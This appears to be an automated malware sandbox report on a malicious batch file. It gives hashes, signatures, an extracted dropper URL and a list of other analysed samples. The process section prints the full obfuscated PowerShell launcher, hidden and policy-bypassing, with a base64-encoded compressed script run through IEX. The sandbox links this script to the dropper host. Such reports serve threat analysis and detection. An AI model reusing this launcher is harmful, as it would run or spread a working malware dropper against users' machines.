Overview

overview

10

Static

static

10

068428a4ac...26.exe

windows11-21h2-x64

8

0c4791a6b4...ea.elf

windows11-21h2-x64

3

0d9bd2ae2e...ea.exe

windows11-21h2-x64

7

0fa00d4f4f...70.dll

windows11-21h2-x64

1

10de02fec8...d1.bat

windows11-21h2-x64

8

1157191701...32.exe

windows11-21h2-x64

7

16e81343ec...a5.exe

windows11-21h2-x64

7

17691f0962...b7.elf

windows11-21h2-x64

3

17c24104e8...12.exe

windows11-21h2-x64

3

1816cd993d...28.exe

windows11-21h2-x64

7

1b8cda768b...8a.elf

windows11-21h2-x64

3

1df6acbc11...b7.elf

windows11-21h2-x64

3

1e7706ed04...b0.elf

windows11-21h2-x64

3

1f580428fa...2c.elf

windows11-21h2-x64

3

257fc477b9...cc.elf

windows11-21h2-x64

3

262a10ee37...50.elf

windows11-21h2-x64

3

267909cf4a...e7.bat

windows11-21h2-x64

10

2796760675...13.elf

windows11-21h2-x64

3

27e181c699...8c.elf

windows11-21h2-x64

3

2b4b073178...74.elf

windows11-21h2-x64

3

2b5bf75c0a...35.exe

windows11-21h2-x64

7

2bac99f5be...ec.elf

windows11-21h2-x64

3

2cfeefaa13...50.elf

windows11-21h2-x64

3

2e48ee0fb3...66.exe

windows11-21h2-x64

10

2e4d872360...5b.exe

windows11-21h2-x64

10

31b6a60839...1b.exe

windows11-21h2-x64

3

320ccae2e9...0d.exe

windows11-21h2-x64

10

3476006a8f...16.apk

windows11-21h2-x64

3

3545082c16...2e.elf

windows11-21h2-x64

3

377c3c3679...05.elf

windows11-21h2-x64

3

3c40413f93...f5.exe

windows11-21h2-x64

10

cbe27936a3...8b.iso

windows11-21h2-x64

3

Resubmissions

22-04-2024 22:02

240422-1xtwbagh68 10

22-04-2024 19:25

240422-x42b7afa68 10

19-04-2024 03:02

240419-djmthsfh8w 10

Analysis

  • max time kernel
    1395s
  • max time network
    1179s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-04-2024 19:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat

  • Size

    6KB

  • MD5

    c3a090912dd6f7c536225858fb24387c

  • SHA1

    3773938587b06c7dc300b3d973c715c685a28877

  • SHA256

    267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7

  • SHA512

    7ff0e8434fafbc88e3e444a0300504c01e3976c369662ec55c70e38c1178f8e383522362efc2c4bde8c338bbb6c14007617a8696a6cb2082036c00136db6f0f8

  • SSDEEP

    192:UPtKEKMJRLI0WCUaypBO2xzk4oquKEwY6edkEEhd:UPtKdMJpJV2xo4oCEwAAhd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://po.vigorlabs.info:443

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\267909cf4a62955a35b0fe013afbfd62d7ae1a1eef6d7a24d7ce50db52d48ce7.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKABbAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAF0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEgANABzAEkAQQBHAG8AeQA1ADIAVQBDAC8ANQAxAFgAVwAzAFAAYQBSAGgAUgArADEANgAvAFkAYQB2AFMAQQBFAGkAUQB1AFMAZAB6AEcARABEAE8AMQBaAGQAegBRAHgAagBZAEYANABzAHkAVQA4AFgAUQBXAGEAWQBHAE4AaABWAGIAWgBYAFIAawBJADUAYgAvADMAbgBGADAAaABpAEIATQBuAGEAVAAwAGUAbQB6ADIANwA1AC8AYQBkAEsANQBQAFIAUgBtAG0AMgBEAEsAKwBaAEQAawBkAE0AUAB2AEMAWQBEAFEAVABQADkAQgBYAE4ANgBKAHoASgB1ADkATgBUAHAARABJAFoATQBhAG4ANQBqAE0AZABVAHMAMQB1AGEAOABvAFIAcQBMAHIASwBJAHAAdQBtAFUAeAB2AGUAawBTADcAYQBlAGwAZwBYAGIATwBWADQAeQA2AC8ANQBhAGMAMQAzAGYAOABSAFoAZAAxADMAVQA4AEYAWgB0AC8AaABVAHcAVgBYAGkAeQAwAHoAdABWAHAAbwA1AEcATAA4AEkASABQAGgAVQB6AHAAVgBJAFUAOABtADQAbgBUAGwAeQA5AGYASQBGAGMATQBMADcAdAB1AEkAeABVADAAYQBlAFIAZwBnAG0AcgB3AEwARwBIAHIATQBGAC8AawBEAFIAVABYAE4AYQBJAG0AegBUAHQAbgBWAG0AUQB4AFcAawBHAGkAcwB5AHQAUwA4ACsANwBaAHAAdQA3ADEAYgAvADIAdABvACsAVQBHADcASwBGAGcAMQBUAFYAYgBCAFQAZgBUAEQAeQB6AFcAeABDADAAZABIAFQASABRAHcAUABVAG0AagBPAFEAbQAxADIASQB1AGEAYgA3AFkAaABFAFAAKwBJAFUAcwBvAFMANgAzAGIAaQBlAHYAcwBDAEwAZwBhAEwALwA2AHIAbgBEAE8AbQA3AEgAbQBQAHAAUgBRAFAAUABHAEgAUwBCAFcAUgBvAGUAQwBVAFMAQgB0AEkAbQAzAHgAUQBSADgAWAB6AEIASgBEADQARgA4AEsAUAB6AEMAQgBrAEgATgBFAGwANABOAHYAOAB1AGIALwBtAHUAWgBQADYATABTAGEARwBRAC8AVAB3AFYAOABmADIASQBmADAATABsAHIAZgBZAHYAUwBQAHEARABiAFUAcABDACsAOQBXAEoAdwAyAGMAQQBJAEcARABuAGIAUABjAGYAdwB6AG4AVAA0ADAAMwBPAGEAbgA1ADQAVABaAGUATQBCAE8AdwBqAHUASwA0AGwAUwBJAGMAbwBBAFMAcABoAC8ALwBiAEkAbgBFAGgAawBrAEMAUQBhAGwARgA1AEsAcwBUAHkAbgBpAHAAMgA4AHQASwArAE4AMwBKADMARABVAHMAVQBPAGIARQBEAGIATwBUAHUAcgBDACsASgBXADYAWQBYAFAAMwAxAGMATQBwAHYAKwBnAFoAaABSADkAcABOAG8AeQBJAGgAVwBWAGUAMwBSADMAUwBLAEgAZQBkAGIAUgBQAG8AUwBLAEQARgBQAEsAbQBSAHkAcgBHAGIASwAzAEQAWABoAFkATAB4AEIAWQBVAHYAUgB0AGYALwBoAEwAKwB4AHYAVAA1AFIAagBOAFYAUQB3AGIASABaAEEAbgBtAEkAYwBwAHcAUABNAFEAVgBGAEUAYQBTAFEAYgAwAEEAcAA0AG0AUgByAE0ARwA3AEcAZAA2AHcAYwBDAHgAcABwAG0AWgBDAEwAaQA5ADUAUgBsAE0AVABuADUAbwAzAHIAWgBOAG0AbgBYAGoAVAA4AEMAMwBMADUAbgByAGgATwA1AE0AcABhAEoAagBjADMAUgBFAHYAdAB3AEkAQgB2AE8AZgBFAG0AegBsAGYATwBqADgAVwBuADcAdQBlACsAOAA2AFIAZQB4AGUAOQB5AGoAMgBXAHgAWQAvADkAKwB4AGEARQArAE4AegB4AGIATgBDAG0AawAyAFkAWQB0AGwANwBkAGYAZQA0AHQAQgBoAFAASwAvAHQAagBqAEMAMwBiAGsAYwBZAEUAMwB5AFoATQBlAHQAMAA2AE8AWABDAFkAQgBuAEgAMwBuAGUAOABDAFgAeAB2ADIAQQAvAFQAOABvAHkAUwB0ADgATQBKAEEAdgBhADUATgA0AFEAZQBWAGQAMAAvAGYAOQBJAC8AVABnAFgAZgBDAGUAVABlAE8AVQBzADAAdwBEAGoAcABFAFEAOQA1AHoANQBaAEcAdgBkAHIAdQBIADkAQgBiAGgATgBnAGsAdgB3AGoAMABLAFAAMgBNAEIAUABjAEgAVQBWAEoASQBuAHIAZAArAHkAcgBDAGIAUgBNAHAAdgBrAFMAQwAzAE4AQQBwAFcASwA5AE4AWQAxADEAegBVAHYAcQB4ADYALwByAFgAbABhAGsASwBmAEwAYwBQADgAMwBqAHQAbAArAC8AZgBoADIAMAAyAGsARwB6ADUAWAA2AGQAMgB4AFkAVABDAFYASQBOADAASQBPAGgAYgBNADAAMQBaAEgAeQBoAG0ATQB5AHcAcQBMAG8ARQBlADMASgBPAGwAVgBvAEoAbQBlAHkAUABVAHEAdwAzADAARgB6AEwANAB5AHIAKwB2AFAARQBkAEQAUQBvAEEASQB6AEoAZwBkAEIAeQByAEMAZwBKAEgAcwA0AFQAVQBJAE8AOABVAGgARQBJAEIAYQBwAHAATwBVAHgAWgBHAGIANABlADMAOQBoAHgAZQAwAFEAOQBDAGsAbQBDAHUAUwBSAHYAZwBoAGMAYQA2AGkAcwBNADMAagBFAEoAegBWAE8ARgBaAGsAdABUAGMATgAwAEoAcABjAEcARgBSAGwAaQB5AGYAZwBWAHgALwBDAHcATgBFADgAbAB5AGYAcQBtADQAMQBPAHoAeQA4AGUARwBKAEMAZABLAHIAMwA4AFMATQBHAGIATQBHAFAAVgBiADQARABRAEkASwB6AE8AWABnAEMAUQBGADYASgBUAHoAeABOAGEAZQBOAFYAMgBDAFMAMQA5AHkAQgBUAHIAQgBTADUASABwAE4AVwBNADIAeAAyAEMAQgBCAE8AWABuAGIASQBHAHYALwBJAGgAOQBOAFcAKwAwAFgAWQA5AEMARQAxADQAbgB2AFIAYQBEAGQAYgBUAGYAaAB0AGsAVQBzAHUAMgBVAHkAcwBHACsAWQBXAHAAOQBsAGoAaABVAE0AMgBZAHgATABHAFEAUgAwAG4AcABJAEYAdQBqADcAcABKAHAAMQBYACsATABjAHcASAArAFAAVABBAFUAVABjAGoAZAB4AC8AdABLAHIAWQBtAEUAbABWAHMAagBkAGoAQgBhAEkAUQBGAGEAOAB0AGsATABBAEkAegBQAEoAagBOAC8AYwBOAFQARQBwAHkAcABRAFUAcAA1AGgAcwBWAGkAYwBqAGwAbQBrAEkAagBRAGoAMgBQAEoARQBnAFUAUwBNAHIAQgBNAFcATQB1AFUAdABXAHgAcAA1AHUAVQBTAEEAQQB4AHAAbwBjAFgAUwByAEEAWABoAFkAQQBSADkASQBBAEUAaQBwAHkAbQBwAEwASwB1AGoASABSADEAMABNAGoAeABjAG8AOQBoAEsAUgBRAGYARwBMAG8AYQBlAGIAQQBrAGkAQgA5AEcANQBZAEQATgBhAHAAUAByAFIAZQAvAFMANwBRADIAdwA4AEQAUwBoAEkAWABPAFYAQQBLAHQAbQBkADcANwBNAGYAbQBCADkAYgBBAC8AUQBqAEMAdABwAGsAQQBJADcAMwBWAFUAOABlAFIAMwBWAHkARgBLAFkAMwBrAEgASgBEADkAcgBGAGcAUwB0AHMAbgBPAE0AUQBOAFoAeAAzAEcARwBGAE4AWQBDAHYAMgBMAGIAdABsAEQAWABOADkANgBjAGQAUgBzAGMAbQBoAEQAZwBGAGYATgBNAHgARwBHAEcAVgArAEgAbABjAHAARQBzAFMAbwBFAHYASABxAE8AVgA4ADUAUgBzAGkATwB4AE8AaQArADYAdwBJAFMANwAxAE4AYwAyAGgAZwBHAEUAUABlAFkANQBUAGMATQB5AHkAZgB2AEcAVgA3ADAAQgBVADYARwBWAFIAWQBXAFUAYwBNAGIAVwAvAFUAUQA2AFAAaQAyAHAASQBnAEIAYwBCAFUANwBGACsAUQA4AFoAYwBGADcAdwBWAFAAZQB6AG8AVQBpAHgAMAA1ADAAbABTADUANQB4AHAAUwBXAEYAQwBXAEwAYQBVAGwAdwAyAEwAZABOAHAASQBXAFkAeAA0AEUAZwBDAGoAbQBuAE8ARQB6ADgAcwBLAGIAZwB1ADIARgBxAEEARABPAHMAcgBLADYAOABHAE4AdgBqAFEAUgBSAGcAcwBsAGMALwBjAEgAYQBhAEgAUABVAEEANwBnAEQAMQB4ADYAeABWAGQAWQAyAHUASQBLAHAANwBEAFQAYgBuADQAYgBZADAAZwBsAGoAMgBjAEgAZwBvAEwATgB4AEgAUABFAG0ATwB4AHoAQQB0AHQATAAzAHoAUAA5AGIAZQBsADUASwBMADcARwBjADgATwBvAGkAdQA2AGIAawBWAEwAbwBFAEoANAAxAHYARwBLAHoAaABkAFMATABHAFUAdwB2AEkAbAA2AG8AOQBIAE4AOABPACsAegBZAGYAUwBtAFAAKwA1AEYANAAzAGYARABYAGcAZgA5ADcARgBSAEkAZABGAHAAdQB1AGUAUABtAGUAUgBjAEcATgBBAGwAdwBEAE0AcwAvAFoASABGAFMAZgBPAGoAbAA4AGEAdgBwADYANwAvAFUAcABYAHcAcgA1ADUAdQBmAG4ALwArACsAZQB0AHMAWQBuAGEAdwArAFgAZgB6AFoAMQBwACsAUwBVAFIAeQB2AGIAKwBkAGQARQBoAFEAWgA4AGMAUgBoAHkAUQBWAEIAYgBtADgANAB2AEIAbABpAGwAeQB4AFQAYwBBAC8ANABZAGYAUQBGAE4AbQBzAEIAOQB0AHcAUABJAFgAQQBaADkAbQBCAFYAagB0AEIAOQBLAGsATABZAE0AVwAwAFMAOQByAC8AcwBRAG4AZgAyAEIAcABRAE4ARQBzAFkAWQB2ADIAZgBFAGYAUQBiAFMAbgByAGsANABPAGYASgAvAEMARwBmAHIAbgBmAE4ARgAyAFMAaQBDAGkAMgBUAHQAcAA0AGsAMQBDAHAASwBwAHIANgA1AGgASgBOADcASQAzAGoATABYAEcALwB4AGUAWQB2AHYAagBUADUATgBlADkAcwBDAGwAeQBMAEIAMQA0AFQANABBAHcAYgBrAHcAdwBjAEUAcwB3AG8AMQBDAHcAMgBlAEYARABMAGkAYwBFAHYAaQBSAFQAQgBjAHkANgA2AEIAUwBBAFYAdABPAHYARABBAGwAUwBqAGcAQQBpAGQAOQBJAGMASwBrAHkAYwB3AGcAegBuAGsAcABKAHMAWgB6ADYAUwBMAGkAWgBtAFoAZQBxAGIAaAA3ADYATgBuAFIANwBqAEkAMABNADgANgBVAEgASgB2AFYAcwBZAGsAWABjAFYAWQBGAFoAUQBjAEcAdwBRAEIAUQBhADgAZwBUADIAUgBpAG0ARgBoAEsAOAArAE8AOAB5AHIAbABDACsANQA3AHIANQBvAG8AcwBOADIARQBsAGcANwB2AFIAWABsAEcAbwB3ADQAYQBaAHIAagBhAHMARwB4AEMAdgBCAEIATwBSAG8ATQBvAHgAbgBFAHoAWgBMAEYAcwBGAGwAeQB0ADcAcAB2AGQAYQBxADcARQB0AHoAcQBQAE4ASgBVADYAbQBDAFUATQBwAFoAYgBkAFEAYwBwAHAAWABMADcALwB4AGwAcABXAHkARQBZAEsAcgB1AEcATwA4AGYAeQBkAHMANgAvAGgASABWAGcAZgBYADgATwBBAEEAQQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4972

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwkqqyeb.b3o.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4972-8-0x0000018B2DE30000-0x0000018B2DE52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4972-9-0x00007FFB71050000-0x00007FFB71B12000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4972-10-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-11-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-12-0x00007FFB71050000-0x00007FFB71B12000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4972-13-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-14-0x0000018B2DD80000-0x0000018B2DD90000-memory.dmp

    Filesize

    64KB

    Download